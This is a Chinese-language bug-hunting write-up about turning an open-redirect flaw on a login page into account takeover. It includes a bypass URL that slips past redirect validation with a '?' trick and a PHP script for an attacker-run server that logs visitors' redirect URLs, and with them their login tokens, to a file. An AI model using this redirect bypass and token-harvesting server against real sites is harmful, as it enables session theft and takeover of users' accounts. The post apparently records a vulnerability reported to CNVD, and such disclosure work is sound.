首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >一次URL跳转引发的账户接管

一次URL跳转引发的账户接管

作者头像
网e渗透安全部
发布2024-11-21 08:16:34
发布2024-11-21 08:16:34
13400
代码可运行
举报
文章被收录于专栏:白安全组白安全组
运行总次数:0
代码可运行

前言

这本是一次简单的url跳转,就在我准备提交的时候,灵机一动.....

正文

这里我正常检测登录页面,发现有一个疑似可以url跳转的

但是常规构造会被拦截掉

这种并非防火墙,应该是对url中关键内容进行校验,这种方式可以尝试使用?进行拼接绕过。

因此我构造了这样一个

https://www.xxxx.gov.cn/login?service=http://www.xxxx.cn/?xxx.gov.cn/shiro

以此来绕过他的前端检测

因为是刚提交,打码严重哈哈

但是这样的危害一般cnvd只能定级中危,那么我想要达到高危,就需要进一步升级。

因此我尝试登录,通过bp一步步分析其中的登录方式

这里通过几步进行验证,首先是登录验证用户名和密码,成功之后,跳转的url中会添加上令牌。我们构造数据包,发送令牌可以获取到用户的cookie

就是跳转之后的url中会附加上令牌。

构造利用

利用远程服务器,在上面搭建一个php文件,用于远程利用,当用户登陆后跳转访问到我的服务器网址后,访问这个php,会自动接受保存访问者的url到我服务器中的cookie.txt中,我可以通过令牌,发送数据包获取用户cookie。

代码语言:javascript
代码运行次数:0
运行
复制
<?php
// 设置文件路径
$file = 'cookie.txt';

// 获取请求的URL
$url = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";

// 保存URL到文件
file_put_contents($file, $url . PHP_EOL, FILE_APPEND);

print('Hello');
exit();
?>

这里也可以构造跳转到原本的主页,一样不会引起怀疑。

完成账户接管

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-10-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 正文
    • 构造利用
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档